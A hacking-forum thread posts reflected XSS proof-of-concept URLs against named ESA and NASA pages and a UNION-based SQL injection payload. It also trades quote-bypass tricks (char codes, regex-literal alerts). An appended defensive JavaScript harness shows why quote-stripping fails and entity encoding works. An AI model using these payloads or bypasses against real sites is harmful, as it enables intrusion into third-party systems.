European Space Agency + NASA | XSS Vulns
#1
Code:
http://integral.esac.esa.int/cgi-scripts/cc/sgs_search_ccs.cgi?reference=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&version=v3.0&category_screw=XSS

Code:
http://www.rssd.esa.int/index.php?project=idis&page=people&action=Retrieve&searchString="><svg/onload=confirm('XSS')>

Code:
http://science.gsfc.nasa.gov/sed/index.cfm?fuseAction=home.main<svg/onload=alert('XSS')>
#2
Ah, that's a clever way of getting around using quotes in XSS. I've done similar things in SQLi. Had a client stripping and sanitizing quotes, but I got around it with char().

Code:
blogid=264+union+select+1,2,3,4,5,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114)--
#3
(12-24-2015, 10:04 PM)NO-OP Wrote: Ah that's a clever way of getting around using quotes in XSS.  I've done similar things in SQLi.  Had a client stripping and sanitizing quotes but I got around it with char().

Code:
blogid=264+union+select+1,2,3,4,5,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114)--

One way of getting around quotes for XSS when alerting something is simply to use forward slashes instead. This method is often overlooked.

Example: alert(/xss/) as an alternative to alert("xss")
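Added example, not code from any of the posts above: a small JavaScript harness that puts the quote-stripping filter posts #2 and #3 talk about next to proper HTML entity encoding, and decodes the char-code payloads from posts #1 and #2 so a triager can read what they spell. The stripQuotes "sanitizer", the helper names and the payload list are constructed for illustration; nothing here is the code of the sites named in post #1.

```javascript
// Added example (not from the thread). Shows why a filter that only strips
// quotes is no defense: the payloads in posts #1 and #3 never needed quotes.
// stripQuotes, htmlEncode, toCharCall and decodeCharCall are hypothetical helpers.

// Naive filter of the kind post #2 describes: removes quote characters, nothing else.
function stripQuotes(input) {
  return input.replace(/["']/g, "");
}

// Output encoding for an HTML body or quoted-attribute context: every character
// that can change how the markup parses becomes an entity, so the payload is
// rendered as text instead of being parsed as a tag or handler.
function htmlEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return input.replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Spell a string as a char-code call, the way post #2 writes
// table_name=char(117,115,101,114) to avoid typing 'user' with quotes.
function toCharCall(s, fn = "char") {
  return fn + "(" + Array.from(s, (c) => c.charCodeAt(0)).join(",") + ")";
}

// Reverse it: read what String.fromCharCode(...) or char(...) actually spells.
// Returns null when the expression is not a char-code call.
function decodeCharCall(expr) {
  const m = /(?:String\.fromCharCode|char)\(\s*([\d\s,]+)\)/i.exec(expr);
  if (!m) return null;
  return String.fromCharCode(...m[1].split(",").map((n) => Number(n.trim())));
}

// Constructed payloads; none of them contains a quote character.
const PAYLOADS = [
  "<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", // post #1 style
  "<svg/onload=alert(/xss/)>",                              // post #3 style
  "<svg/onload=confirm(" + toCharCall("XSS", "String.fromCharCode") + ")>",
];

// A raw '<' followed by a letter is enough for the HTML parser to open a tag.
const TAG_OPENER = /<\s*[a-z]/i;

// Does the payload still open a tag after each "defense" has run?
function survivesQuoteStripping(payload) {
  return TAG_OPENER.test(stripQuotes(payload));
}

function survivesHtmlEncoding(payload) {
  return TAG_OPENER.test(htmlEncode(payload));
}

// Print a comparison table when run directly (node xss_filters.js).
for (const p of PAYLOADS) {
  console.log(
    JSON.stringify(p),
    "| quote-strip lets it through:", survivesQuoteStripping(p),
    "| entity-encode lets it through:", survivesHtmlEncoding(p),
  );
}
console.log("post #1 payload spells:", decodeCharCall("String.fromCharCode(88,83,83)"));
console.log("post #2 payload spells:", decodeCharCall("char(117,115,101,114)"));
```

Quote stripping lets all three payloads through and entity encoding stops all three; the fix to copy is the encoder, applied per output context (HTML body, attribute, JavaScript string, URL), not a blacklist of characters the attacker may never have needed.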